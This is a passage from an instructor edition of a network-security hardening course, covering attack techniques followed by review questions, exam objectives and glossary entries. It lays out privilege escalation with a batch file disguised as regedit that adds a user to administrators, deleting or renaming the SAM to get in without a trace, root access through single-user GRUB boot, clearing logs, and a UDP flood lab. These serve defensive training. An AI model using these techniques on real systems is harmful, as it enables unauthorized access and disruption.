Hacker: “That is absolutely perfect. I think you may have been one of the luckyones today. Listen, I have something fun to send you also. Kind of a time killer,just a little fun game. Do you want that? If you don’t want it, that’s OK.”

Target: “Of course, I love those stupid games. What is it?”

Hacker: “It’s a fun, addictive game called Whack-a-Troll. If you like it, go aheadand send it to your friends, I won’t mention it to anyone. We all play it overhere, so there is no reason you guys shouldn’t get it, you know?”

Target: “Really, well thanks a lot Warren, I really have to get back to work. So,everything seems ok?”

Hacker: “Yep, seems all good. Have a great day!”

Target: “Thanks, you too. Bye.”

Now, please don’t laugh. Although this scenario illustrates an extreme case, it isnot that far off. In this case, the hacker happened to get lucky and get someoneon the other line that fit the need just right. Of course, this will not happen often,but odds are that it will happen. Think about what this hacker was able to learn,and do, in just a few short minutes.

534 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 588: SCNP Hardening

TASK 8L-1Reviewing the Social Engineering Case Study

1. What was this attacker able to learn during the social engineering?

The hacker got all of the internal IP details, an internal domain name, thecompany DNS server addresses, and the listening ports of this computer!Then, as if that was not enough, the hacker loaded a Trojan Horse in afriendly email sent from a fake address. And, the hacker took the next step oftrying to infect the network with the Trojan Horse. Again, all in a fewminutes. Only a bit more work, and this attacker will end up with completecontrol of the entire network!

Topic 8MGaining Unauthorized AccessAlthough many of these hacker tools are effective, they may require access thatthe attacker cannot get from the Internet to run them. Or, perhaps the antivirussoftware will detect them, as may be the case for well-known programs likeNetBus and SubSeven.

Remember that many people consider the number one threat to network securityto be the employees themselves. If the employee has a bit of programming skill,then the threat can become even more difficult.

This section focuses on very simple programming techniques that can be a threat.Obviously, an attacker would not already have access to the machine as anadministrator, but this is to show what could be programmed into an attack,which would then be sent to the administrator, in the hopes that he or she wouldexecute it.

Privilege EscalationConsider the following situation: On a Windows 2000 network, the user WandaBhas regular user privileges. She decides that she wants to be a networkadministrator. Wanda creates the following simple program in Notepad, and savesit with a name such as regedit.bat.

net localgroup administrators WandaB /addstart regeditr.exeexit

Wanda then arranges (probably by some devious means) for someone whoalready has administrative access to place the file in the %systemroot% folder ofa Windows 2000 Server, rename the original file regedit.exe as regeditr.exe, andreboot the server.

The next time that anyone with administrative privileges tries to edit the Registryof the compromised server by opening the Run dialog box and entering regedit,Wanda’s batch file will run—changing her group membership to Administratorsand granting her the privileges of that group. The administrator who ran Regeditwill probably not be aware that he or she has done anything unusual, becauseWanda’s batch file calls on the renamed Registry Editor.

Lesson 8: Attack Techniques 535

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 589: SCNP Hardening

Files in Windows systems are executed in the following order: .com, .exe, andthen .bat. This is a simple example of how a user can take advantage of knowingthe basics of Windows and programming. The only restriction on how far this cango is the imagination of the user.

Gaining Unauthorized RightsNow, assume a curious user exists in your Windows NT network (remember thataudits have placed over 70 percent of all network abuse on the shoulders of inter-nal users). This user has normal user rights, but that may not be enough—he orshe may want to be a local administrator for his or her own machine. If the sys-tem has not been properly patched and updated, this could be easier than youthink.

There is a utility called GetAdmin that can give a user administrator-level rightson a machine running Windows NT 4.0 Server, if that server does not have anyService Packs after SP 3 installed. Service Pack 4 actually fixed the security holethat allowed GetAdmin to work. The GetAdmin utility can be found at http://packetstormsecurity.org, and there are other similar utilities that can penetrate aserver and assign administrative rights to ordinary users. These utilities can befound on various Web sites such as the one listed here for GetAdmin.

Deleting or Renaming the Security Accounts Manager (SAM)Using L0pht may work in many given situations; however, the attacker may nothave access to this program, or one like it. If this is the case, and the attackerneeds to gain access to a Windows NT computer, one last possible attempt is todelete the SAM. The reason this would be considered a last attempt is it will befound quickly. This section shows how an operating system that is designed to besecure might be compromised with physical access and another operating system.

The Security Accounts Manager is responsible for maintaining all of the usernames, passwords, and account properties for the machine. When a machine isfreshly installed, by default it has two accounts: Guest and Administrator. As theadministrator adds new users and sets passwords for the users, the information isstored in the SAM file. This is all fine until something goes wrong. What happensif the SAM cannot be found when the system boots up? The Microsoft designersthought of this, and if this situation ever occurs, the system will just create a newSAM database with the default values (Guest and Administrator, with nullpasswords). Good news! The server is saved, right? Well, sort of.

If you need access to the system and the SAM has disappeared, the new SAMmight be a good idea. However, if a malicious attacker knows about this design“feature” and can get physical access to the server (such as with NTFSDOS on afloppy disk), he or she could use this knowledge to his or her advantage and pur-posely delete the SAM, in order to gain access to the system as Administrator!

Because all non-default user accounts and passwords have “disappeared” from theserver, the proper administrators of this computer should become aware of theproblem fairly quickly and take steps to correct the problem. Although the attackwas successful, all the alarms should now be blaring loudly, and going back isnot an option.

You may be asking, what else can be done with this technique? Similar to simplydeleting the SAM, but even more effective, is to rename the SAM. If an attackeris able to gain physical access to the server, as described earlier, renames theSAM and the event (.evt) and log (.log) files, and reboots the server, he or shewill be able to access an otherwise secure server. Once the exploitation is com-

At the time of this writing,the latest Service Pack for

Windows NT 4.0 was SP 6a.

If students are interested,and you have a machine

that has only Windows NTServer (without SP 6a)

installed, you candemonstrate how GetAdmin

works.

Windows will also createnew event and log files if the

old ones cannot be found.

536 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 590: SCNP Hardening

pleted, if the attacker deletes the new SAM, event, and log files, restores theoriginal (renamed) SAM, event, and log files, and reboots the server, the attackcan be completed without leaving a trace of evidence that the machine wascompromised. In addition, the original Administrator account is not modified inany fashion.

GRUBFor default Linux installs, there is an even easier way to gain access to the rootaccount if you have physical access to the system. This access method is builtinto the operating system in the form of the GRUB Loader.

In Linux, if the attacker has local access to the computer, the job of securing thecomputer is much more difficult. One option the attacker may use is to simplyboot to a different mode. Booting into Single User mode tells the operating sys-tem to boot into a mode where networking is disabled, software drivers are notenabled, and is designed for administrators to work on the OS itself. The consoleis still available though, and a user who is logged on in Single User mode hasroot access.

TASK 8M-1Investigating the Single User GRUB Loader

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Restart your computer.

2. When you are prompted to choose an operating system, highlight RedHat Linux, but do not press Enter.

3. Type e then select the line that starts with kernel, and type e again.

4. Press Spacebar and enter single to specify single-user mode.

5. When you are returned to the screen with kernel highlighted, type b toboot the OS. Linux starts in single-user mode.

6. Enter ls -l /root and cat /etc/passwd to test the access you have in single-user mode.

7. Browse to other directories on the hard drive. In single-user mode, youhave root access, even though you did not log in as root.

8. Enter shutdown -r now to reboot the computer. Log on to Windows 2000as the renamed Administrator account.

Single User mode is used torecover the operating systemfrom system crashes, or toregain root access in theevent that the root passwordhas been changed orforgotten.

If students choose Red HatLinux instead of justselecting it, they will needto restart the computer andtry again.

Lesson 8: Attack Techniques 537

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 591: SCNP Hardening

Topic 8NHiding Evidence of an AttackGenerally, once an attacker has been in a system, it is important that the attackernot leave any traces of the attack. Although it is close to impossible to not leaveany trace at all, it is possible to make it hard to locate the attacker, or evidence ofthe attack.

Clearing Log and Event FilesThe two common areas that an attacker will work with to hide the evidence of anattack are the log files and the audit policies. Clearing the audit files will hidemuch of the evidence of the attack; however, the fact that the logs are clearedshould raise red flags to even inexperienced administrators. The event log doesnot clear itself every now and then!

Hiding Attack FilesAnother way that attackers can clean up after themselves is by hiding the filesthat they placed on the system. For instance, think back to the example ofWandaB. To cover her tracks, she could change the properties of regedit.bat sothat the file is hidden. Or, she could also rename the file to hide it from the realadministrators.

Topic 8OPerforming a Denial of ServiceUp to this point, the tools you have been using identify possible holes in thesecurity of a system and the vulnerabilities of hosts. If the goal is not to gainaccess to a host, but to only disrupt access, then Denial of Service is required. Byflooding the target, it becomes useless on the network.

The concept is similar to standing on a balcony during a press conference. Imag-ine being surrounded by 300 people, and 290 of them are just shouting out theword “Padding!” while the other 10 people are trying to ask legitimate questions.Do you think you would be able to properly respond to the 10 legitimate ques-tions asked of you? Do you think you would even know that the questions werebeing asked?

A common technique for performing a DoS is Smurf. Smurf is a tool that takes adifferent approach to the normal DoS routine. DoS would normally use defaultpings to overwhelm a given host. To really take up the resources a given targetwants to use, the attacker would have to compromise many computers, and havethem all ping the target at once.

The difference that Smurf provides is to be able to launch a DoS against a targetwith only a single computer. Smurf works by sending a ping packet to the broad-cast address of a network, with a spoofed source IP address. The source IPaddress is the actual target. When the network clients respond to the ping packet,they will all be sending a reply to the spoofed address. The number of hostsinvolved in this attack is limited to the number of hosts that are active on thenetwork.

538 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 592: SCNP Hardening

DoS attacks can run via multiple protocols, such as UDP and IP. Having theoption to use multiple protocols increases the chance of getting past the firewalland being undetected by the Intrusion Detection System.

TASK 8O-1Flooding with Udpflood

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Copy udpflood.exe from the location provided by your instructor to theroot of your C drive. Unzip the file if it is zipped.

2. Open a Command Prompt, switch to the C drive, and enter udpflood toopen the udpflood utility.

3. To target a machine, enter its IP address into the Destination field, anduse a well-known port of your choice, such as 80.

4. Set Max Duration to 360 seconds and Max Packets to 999999.

5. Set Speed to 250 packets/second by sliding the bar all the way to the right.

6. Click Go when you are ready to start the flood. Observe the lights on thehubs/switches in class.

7. If you want to have a bigger impact on a machine, have severalmachines target the same host and then try to transfer a file to or fromthat target to another machine. If you are unable to complete this step,you will have performed a small-scale Distributed Denial of Service.

8. Close all open windows, and shut down the computer.

OOB ExploitIf a temporary DoS caused by a flood is not enough of a disruption to theattacker, that attacker might try to cause a target to reboot or otherwise crash. Ifthat were the intent, the attack would now fall into the category of the Out OfBounds (OOB) attack. You can cause an unpatched Windows system to hang(show the blue screen) by sending it a packet that is malformed in such a waythat the TCP/IP stack of the machine doesn’t know how to react, so it respondsby giving us one of the much feared BSODs (Blue Screens of Death).

Provide students with thelocation of the udpflood.exefile.

Lesson 8: Attack Techniques 539

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 593: SCNP Hardening

SummaryIn this lesson, you looked at the general methodologies that a hacker mightuse to attack a target host. We detailed the concept of network reconnais-sance and other means of gaining information about a potential target. Wealso investigated the issues surrounding network scanning, network sweep-ing, and port scanning, by using different tools and operating systems.

We identified common social engineering techniques, and identified commonissues regarding Trojan Horse, virus, and worm programs. Finally, we took alook into some basic programming techniques.

Lesson Review8A Describe some of the methods that an attacker can use to identify infor-

mation about a potential target.

Responses might include newsgroup postings, email headers, Web sites,merger news, and Whois lookups.

8B What could a potential attacker learn by tracing a network?

The internal network configuration, including router names, router configu-rations, and Web and email server locations.

8C What is the primary reason for sweeping a network?

To identify the active hosts. These active hosts may then become the targetsof the attacker.

8D What is the primary difference between a SYN scan and a full connectscan?

The SYN scan does not complete the connection between the two nodes,while the full connect scan completes the three-way handshake. The full con-nect is more likely to be caught by any Intrusion Detection Systems presenton the network.

Why would an attacker perform stack fingerprinting on an IP address?

To identify the operating system type and version that is running on thetarget. If these are identified, then the attacker can focus on specific exploitsfor that system.

In addition to being able to determine which hosts are active on the tar-get network and what ports they have open and listening, what else cannmap identify by matching TCP/IP signatures?

The operating system running on the host.

540 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 594: SCNP Hardening

8E Which is more of a threat to a network: a virus, a Trojan Horse, or aworm?

It can be argued that all three are the highest threat. The virus may consumeresources, such as DoS on the email system. The worm can be dangerous,since it can self-replicate through the network. The Trojan Horse can be ahigh threat in that if written cleverly, many people may execute it and spreadit through the network. So, there is no one correct answer to this question,and if you identified this point, you are right!

8F How many ordinary, non-savvy users a day could a Web site such asMalweb trick into installing something other than a font?

Surprisingly, many! In this topic, you performed a task that an ordinary userin a typical corporate environment is tricked into doing almost on a dailybasis. The connection is initiated by the user. Malicious Web sites are amajor source of concern, as firewalls are typically configured to allow theuser to initiate a connection to the Internet and not vice versa. If the userthen downloads malicious programs in the form of spyware embedded inads, games, or even so called helpful similar software, then the user’smachine can be compromised.

8G True or False? Netcat can be used as a cross platform tool.

True.

8H Why are hardware keyboard loggers more dangerous than software log-gers?

Because they are completely independent of the operating system.

8I What file in Windows NT stores the current list of user names and pass-words?

The SAM.

What file in Linux stores the current list of user names and passwords?

etc/passwd and etc/shadow are both correct answers.

8J What is the weakness exploited by tools such as Snadboy?

The characters as typed are echoed on screen by a mask—Snadboy simplyreveals what is under the mask.

8K What is a network’s primary defense against social engineering?

Education of the users of a network is the only true defense against socialengineering. Each user should be instructed on how to respond to situationssimilar to those described in this topic. Social engineering is one of thetoughest issues a network needs to defend itself against.

8L Why are Trojan Horse programs often small, simple games?

By using a simple game, the attacker can ensure the game will circulate theoffıce quickly. If the game were hard or large, it would not work via emailand not spread as quickly. The simple games are used specifically becausethey are simple.

Lesson 8: Attack Techniques 541

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 595: SCNP Hardening

8M What Windows NT file, if deleted or renamed, would grant access to theoperating system with administrative privileges?

The SAM file.

8N What are the two common areas an attacker will work with to hide hisor her tracks?

The log files and the audit policies.

8O How does Smurf perform a DoS?

Smurf spoofs the source IP address with that of the intended target’s IPaddress. Thus, all replies to ping would be directed to the target.

542 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 596: SCNP Hardening

Hardening theInfrastructure ExamObjectives

Exam Objectives

IntroductionThe Hardening the Infrastructure exam is designed to validate the foundationskills that a security professional requires. These skills include, but are not lim-ited to, Router Security, Operating System Security, Advanced Knowledge of theTCP suite, and Network Security Basics.

Domains and PercentagesThe Hardening the Infrastructure exam has 6 Domains. The percentages of eachdomain in the exam are defined in the following chart:

Examination Domain Percentage of Exam1.0—Contingency Planning 52.0—Tools and Techniques 93.0—Security on the Internet and the WWW 114.0—Router Security and ACLs 155.0—TCP/IP Packet Structure and Security 256.0—Operating System Security 35Total 100

Note:Important: All percentages are approximate and subject to change at any time.

The Hardening the Infrastructure exam will be updated every year to ensure thatcandidate’s knowledge remains current and updated. In the event that significantchanges are to be made at the yearly update, the Security Certified Program Website will announce those modifications.

Mapping Exam Objectives to Course ContentThe following table lists the test domains and objectives for the Hardening theInfrastructure examination, and where they are covered in this course.

APPENDIX

A

Appendix A: Hardening the Infrastructure Exam Objectives 543

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 597: SCNP Hardening

HTI Test Domains and Objectives TopicsDomain 1.0: Contingency Planning (5%)1.1. Fundamental Contingency Planning• Identify the Need for Contingency Planning• Describe Environmental and Technological Disasters• Examine the Impact of the Plan on Business

Lesson 6, Topic A

1.2. Creation of the Contingency Plan• Requirements of the Plan• Goals of the Plan• Testing the Plan

Lesson 6, Topic B

1.3. Technologies of Power• Personal UPS Devices• Server Room UPS Devices• Full Building Generators

Lesson 6, Topic C

1.4. Backing up the Operating System• Backup Strategies• Backing up Windows Systems• Backing up Linux Systems

Lesson 6, Topic D

Domain 2.0: Tools and Techniques (9%)2.1. Perform Network Scanning and Discovery Methods• Network Reconnaissance• Network Scanning• Network Mapping

• Network Reconnaissance: Lesson 8,Topic A

• Network Scanning: Lesson 8, Topic D• Network Mapping: Lesson 8, Topic B

2.2. Describe Virii, Trojans, and Worms• Virus• Trojan Horse• Worm

Lesson 8, Topic E

2.3: Examine Social Engineering techniques• Email Social Engineering• Telephone Social Engineering• Physical Social Engineering

Lesson 8, Topics K and L

2.4. Describe Privilege Escalation• Basic Programming Techniques• Gain Unauthorized Access

Lesson 8, Topic M

2.5. Examine the process of Keystroke Logging• Hardware Keystroke Logging• Software Keystroke Logging

Lesson 8, Topic H

2.6. Examine the Concepts of DoS• Denial of Service• Distributed Denial of Service

Lesson 7, Topic C; Lesson 8, Topic O

544 Hardening The Infrastructure (SCP)

New Horizons Course Lessons and

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 598: SCNP Hardening

HTI Test Domains and Objectives Topics2.7. Exploiting Password Weaknesses• Strong Password Design• Weak Password Design• Password Cracking Techniques

• Strong Password Design: Lesson 4,Topics B and C

• Weak Password Design: Lesson 4,Topics B and C

• Password Cracking Techniques: Lesson8, Topics I and J

Domain 3.0: Security on the Internet and the WWW(11%)3.1. Identify and Define the Weak Points in the Structureof the Internet• Tier System• DNS• ISPs• NAPs• Routers• Denial of Service

Lesson 7, Topics A and B

3.2. Define Web Site Attack Techniques• Poor Programming• Buffer Overflows• Vulnerability Scanning• IIS Vulnerabilities• Apache Vulnerabilities

Lesson 7, Topic C

3.3. Define Attack Techniques of Web Users• Email Attacks• Scripting Vulnerabilities• File Attachments• Cookie Misuse

Lesson 7, Topic D

3.4. Hardening Internet Access Points• Internet Explorer Browser Settings• IIS patching and Hot Fixing• Apache Fundamental Security Settings• Securing Email Clients• Securing DNS Transfers

• Internet Explorer Browser Settings:Lesson 7, Topic D

• IIS patching and Hot Fixing: Lesson 7,Topic C

• Apache Fundamental Security Settings:Lesson 7, Topic C

• Securing Email Clients: Lesson 7, TopicD

• Securing DNS Transfers: Lesson 7,Topic B

Domain 4.0: Router Security (15%)4.1. Implementation of Fundamental Cisco RouterSecurity• Cisco Authentication and Authorization• Implementation of Passwords• Implementation of Banners• Configuration of SSH• Verification of SSH

Lesson 5, Topic A

Appendix A: Hardening the Infrastructure Exam Objectives 545

New Horizons Course Lessons and

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 599: SCNP Hardening

HTI Test Domains and Objectives Topics4.2. Describe the Routing Process• Describe the ARP Process• Describe the LAN to LAN Routing Process• Describe the LAN to WAN Routing Process• Examine Routing Protocols

Lesson 5, Topic B

4.3. Removing Unwanted Protocols and Services• Describe What Services to Remove• Configure the Removal of Unneeded Protocols• Configure the Removal of Unneeded Services

Lesson 5, Topic C

4.4. Creation and Implementation of Access Control Lists• Describe the Cisco ACL process• Create Wildcard Masks• Implement Standard ACLs• Implement Extended ACLs• Implement ACLs to defend against attacks

• Describe the Cisco ACL process:Lesson 5, Topic D

• Create Wildcard Masks: Lesson 5,Topic D

• Implement Standard ACLs: Lesson 5,Topic E

• Implement Extended ACLs: Lesson 5,Topic E

• Implement ACLs to defend againstattacks: Lesson 5, Topic E

4.5. Configuring Cisco Router Logging• Describe Logging Options on a Cisco Router• Configure Buffered Logging• Configure Antispoofing Logging

Lesson 5, Topic F

Domain 5.0: TCP/IP Packet Structure and Security (25%)5.1. Examine the Core Concepts of TCP/IP• Create a VLSM• Identify Protocols and their Corresponding OSI Layer• Describe Multi, Broad, and Uni-Casting• Examine Packet Capture and Analysis Tools• Analyze packet Fragmentation

• Create a VLSM: Lesson 1, Topic A• Identify Protocols and their

Corresponding OSI Layer: Lesson 1,Topic A

• Describe Multi, Broad, and Uni-Casting: Lesson 1, Topic A

• Examine Packet Capture and AnalysisTools: Lesson 1, Topic B

• Analyze packet Fragmentation: Lesson1, Topic G

5.2. Identify and Describe Packet Headers• Describe the Structure of a Packet• Identify and Describe the IP Header• Identify and Describe the ICMP Header• Identify and Describe the TCP Header• Identify and Describe the UDP Header

• Describe the Structure of a Packet:Lesson 1, Topics C, D, E, and F

• Identify and Describe the IP Header:Lesson 1, Topic C

• Identify and Describe the ICMP Header:Lesson 1, Topic D

• Identify and Describe the TCP Header:Lesson 1, Topic E

• Identify and Describe the UDP Header:Lesson 1, Topic F

546 Hardening The Infrastructure (SCP)

New Horizons Course Lessons and

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 600: SCNP Hardening

HTI Test Domains and Objectives Topics5.3. Examine the Session Setup and Teardown• Describe the TCP Lifecycle• Identify the Concepts of the Three-Way Handshake• Describe the Session Establishment Process• Describe the Session Teardown Process

• Describe the TCP Lifecycle: Lesson 1,Topic B

• Identify the concepts of the Three-WayHandshake: Lesson 1, Topic B

• Describe the Session EstablishmentProcess: Lesson 1, Topic B

• Describe the Session TeardownProcess: Lesson 1, Topics B and H

5.4. Identify and Implement IPv6• Describe Benefits of IPv6 over IPv4• Identify IPv6 Addressing Schemes• Implementation of IPv6 on a Windows client• Configuration and Use of IPv6 Utilities

Lesson 1, Topic I

Domain 6.0: Operating System Security (35%)6.1. Windows 2000 Infrastructure Security• Describe Active Directory Components• Describe Group Policy• Creation of a GPO

Lesson 4, Topic A

6.2. Examine Windows 2000 Authentication• Describe LM Authentication• Describe NTLM Authentication• Describe and Configure NTLMv2 Authentication• Describe Kerberos in Windows 2000

Lesson 4, Topic B

6.3. Implement Windows 2000 Security ConfigurationTools• Securing the Administrator Account• Configuring the Security Configuration and Analysis

Tool• Implementing Security Templates• Creation of Security Templates• Using Secedit.exe

Lesson 4, Topic C

6.4. Configure Windows 2000 Resource Security• File and Folder Permissions in Windows 2000• Implement Windows 2000 Registry Security• Implement Windows 2000 Printer Security• Manage Services and SubSystems• Implement EFS

• File and Folder Permissions inWindows 2000: Lesson 4, Topic D

• Implement Windows 2000 RegistrySecurity: Lesson 4, Topic D

• Implement Windows 2000 PrinterSecurity: Lesson 4, Topic D

• Manage Services and SubSystems:Lesson 4, Topic D

• Implement EFS: Lesson 4, Topic F6.5. Windows 2000 Auditing and Logging• Enable Auditing in Windows 2000• Manage Event Logs• Security-related Event IDs• Audit Authentication Access

Lesson 4, Topic E

Appendix A: Hardening the Infrastructure Exam Objectives 547

New Horizons Course Lessons and

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 601: SCNP Hardening

HTI Test Domains and Objectives Topics6.6. Windows 2000 Network Security• Examine NAT and Internet Connection Sharing• Describe the Routing and Remote Access Service• Examine the Internet Authentication Services• Implement a RADIUS system

Lesson 4, Topic G

6.7. Fundamental Linux Security• Configure File Permissions• Configure Directory Permissions• Managing the Password File• Managing the Shadow Password File

Lesson 3, Topic B

6.8. Securing SAMBA• Configuring SAMBA Key Files• Configuring the SAMBA Server• Configuring the SAMBA Client• Securing the SAMBA Connections

Lesson 3, Topic D

6.9. Network Configuration Security• Configuring NFS Servers• Configuring NFS Clients• Securing NFS• Configuring NIS• Securing NIS

Lesson 3, Topic D

6.10. Securing Linux• Remove Unused Services• Implement and Configure TCPWrappers• Implement and Configure Tripwire• Auditing and Logging on Linux• Implement and Configure Bastille

• Remove Unused Services: Lesson 3,Topic E

• Implement and ConfigureTCPWrappers: Lesson 3, Topic C

• Implement and Configure Tripwire:Lesson 3, Topic E

• Auditing and Logging on Linux: Lesson3, Topic E

• Implement and Configure Bastille:Lesson 3, Topic E

548 Hardening The Infrastructure (SCP)

New Horizons Course Lessons and

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 602: SCNP Hardening

Administrative SecurityThe management constraints and supple-mental controls established to provide anacceptable level of protection for definedresources.

AIS(Automated Information System) Anyequipment of an interconnected system orsubsystem of equipment that is used in theautomatic acquisition, storage, manipula-tion, control, display, transmission, orreception of data and includes software,firmware, and hardware.

alertA formatted message describing a circum-stance relevant to network security. Alertsare often derived from critical audit events.

ankle-biterA person who aspires to be a hacker/cracker but has very limited knowledge orskills related to AISs. Usually associatedwith young teens who collect and usesimple malicious programs obtained fromthe Internet.

Anomaly Detection ModelA model where intrusions are detected bylooking for activity that is different fromthe user’s or system’s normal behavior.

Application Level Gateway(Firewall) A firewall system in which ser-vice is provided by processes that maintaincomplete TCP connection state andsequencing. Application level firewallsoften readdress traffic so that outgoing traf-fic appears to have originated from thefirewall, rather than the internal host.

ASIM(Automated Security Incident Measure-ment) Monitors network traffic and collectsinformation on targeted unit networks bydetecting unauthorized network activity.

assessmentAn analysis of the vulnerabilities of anAIS. Information acquisition and reviewprocess designed to assist a customer todetermine how best to use resources to pro-tect information in systems.

assuranceA measure of confidence that the securityfeatures and architecture of an AIS accu-rately mediate and enforce the securitypolicy.

attackAn attempt to bypass security controls on acomputer. The attack may alter, release, ordeny data. Whether an attack will succeeddepends on the vulnerability of the com-puter system and the effectiveness ofexisting countermeasures.

auditThe independent examination of recordsand activities to ensure compliance withestablished controls, policy, and operationalprocedures, and to recommend any indi-cated changes in controls, policy, orprocedures.

audit trailIn computer security systems, a chronologi-cal record of system resource usage. Thisincludes user login, file access, other vari-ous activities, and whether any actual orattempted security violations occurred.

authenticateTo establish the validity of a claimed useror object.

authenticationTo positively verify the identity of a user,device, or other entity in a computer sys-tem, often as a prerequisite to allowingaccess to resources in a system.

GLOSSARY

Glossary 549

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 603: SCNP Hardening

Authentication HeaderA field that immediately follows the IPheader in an IP datagram and providesauthentication and integrity checking forthe datagram.

Automated Security MonitoringAll security features needed to provide anacceptable level of protection for hardware,software, and classified, sensitive, unclassi-fied, or critical data, material, or processes.

availabilityAssuring information and communicationsservices will be ready for use whenexpected.

back doorA hole in the security of a computer sys-tem deliberately left in place by designersor maintainers. Synonymous with trapdoor; a hidden software or hardwaremechanism used to circumvent securitycontrols.

Bell-La Padula Security ModelFormal-state transition model of computersecurity policy that describes a formal setof access controls based on informationsensitivity and subject authorizations.

Biba Integrity ModelA formal security model for the integrity ofsubjects and objects in a system.

bombA general synonym for crash, normally ofsoftware or operating system failures.

breachThe successful defeat of security controlswhich could result in a penetration of thesystem. A violation of controls of a particu-lar information system such thatinformation assets or system componentsare unduly exposed.

buffer overflowThis happens when more data is put into abuffer or holding area than the buffer canhandle. This is due to a mismatch in pro-cessing rates between the producing andconsuming processes. This can result insystem crashes or the creation of a backdoor leading to system access.

bugAn unwanted and unintended property of aprogram or piece of hardware, especiallyone that causes it to malfunction.

C2Command and Control.

C2-attackPrevent effective C2 of adversary forces bydenying information to, influencing,degrading, or destroying the data systems.

C2-protectMaintain effective command and control ofown forces by turning to friendly advan-tage or negating adversary effort to denyinformation to, influence, degrade, ordestroy the friendly C2 system. (Pendingapproval in JP 1-02.)

C2WCommand and Control Warfare. The inte-grated use of operations security, militarydeception, psychological operations, elec-tronic warfare, and physical destruction,mutually supported by intelligence, to denyinformation to, influence, degrade, ordestroy adversary command and controlcapabilities, while protecting friendly com-mand and control capabilities against suchactions. Command and control warfare isan application of information operations inmilitary operations and is a subset of infor-mation warfare.

CGI(Common Gateway Interface) CGI is themethod that Web servers use to allow inter-action between servers and clients.

GLOSSARY

550 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 604: SCNP Hardening

CGI scriptsAllows for the creation of dynamic andinteractive Web pages. They also tend to bethe most vulnerable part of a Web server(besides the underlying host security).

Check_PasswordA hacking program used for cracking VMSpasswords.

Chernobyl PacketAlso called Kamikaze Packet. A networkpacket that induces a broadcast storm andnetwork meltdown. Typically an IPEthernet datagram that passes through agateway with both source and destinationEthernet and IP address set as the respec-tive broadcast addresses for thesubnetworks being identical.

Circuit Level GatewayOne form of a firewall. Validates TCP andUDP sessions before opening a connection.Creates a handshake and, once that takesplace, passes everything through until thesession is terminated.

Clipper chipA tamper-resistant VLSI chip designed byNSA for encrypting voice communications.It conforms to the Escrow Encryption Stan-dard (EES) and implements the Skipjackencryption algorithm.

COAST(Computer Operations, Audit, and SecurityTechnology) A multiple project, multipleinvestigator laboratory in computer securityresearch in the Computer Sciences Depart-ment at Purdue University. It functionswith close ties to researchers and engineersin major companies and governmentagencies. Its research is focused on real-world needs and limitations, with a specialfocus on security for legacy.

compromiseAn intrusion into a computer system whereunauthorized disclosure, modification, ordestruction of sensitive information mayhave occurred.

computer abuseThe willful or negligent unauthorized activ-ity that affects the availability,confidentiality, or integrity of computerresources. Computer abuse includes fraud,embezzlement, theft, malicious damage,unauthorized use, denial of service, andmisappropriation.

computer fraudMisrepresentation or alteration of data inorder to obtain something of value.

Computer Network AttackOperations to disrupt, deny, degrade, ordestroy information resident in computersand computer networks, or the computersand networks themselves. (DODD S-3600.1of 9 Dec 1996)

computer securityTechnological and managerial proceduresapplied to computer systems to ensure theavailability, integrity, and confidentiality ofinformation managed by the computer.

computer security incidentAny intrusion or attempted intrusion intoan automated information system (AIS).Incidents can include probes of multiplecomputer systems.

computer security intrusionAny event of unauthorized access or pen-etration to an automated informationsystem (AIS).

confidentialityAssuring information will be kept secret,with access limited to appropriate persons.

GLOSSARY

Glossary 551

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 605: SCNP Hardening

COPS(Computer Oracle and Password System) Acomputer network monitoring system forUNIX machines. Software tool for check-ing security on shell scripts and Cprograms. Checks for security weaknessesand provides warnings.

COTS software(Commercial Off the Shelf Software)Acquired by government contract through acommercial vendor. This software is a stan-dard product, not developed by a vendorfor a particular government project.

countermeasuresAction, device, procedure, technique, orother measure that reduces the vulnerabilityof an automated information system. Coun-termeasures that are aimed at specificthreats and vulnerabilities involve moresophisticated techniques as well as activi-ties traditionally perceived as security.

CrackA popular hacking tool used to decodeencrypted passwords. System administra-tors also use Crack to assess weakpasswords by novice users in order toenhance the security of the AIS.

crackerOne who breaks security on an AIS.

crackingThe act of breaking into a computersystem.

crashA sudden, usually drastic failure of a com-puter system.

cryptanalysisDefinition 1: The analysis of a crypto-graphic system and/or its inputs andoutputs to derive confidential variablesand/or sensitive data including cleartext.Definition 2: Operations performed in con-verting encrypted messages to plaintextwithout initial knowledge of the crypto-algorithm and/or key employed in theencryption.

cryptographic hash functionA process that computes a value (referredto as a hashword) from a particular dataunit in a manner that, when a hashword isprotected, manipulation of the data is diffi-cult to attain.

cryptographyThe art of science concerning the prin-ciples, means, and methods for renderingplaintext unintelligible and for convertingencrypted messages into intelligible form.

cryptologyThe science which deals with hidden, dis-guised, or encrypted communications.

cyberspaceDescribes the world of connected comput-ers and the society that gathers aroundthem. Commonly known as the Internet.

dark-side hackerA criminal or malicious hacker.

DARPADefense Advanced Research ProjectsAgency.

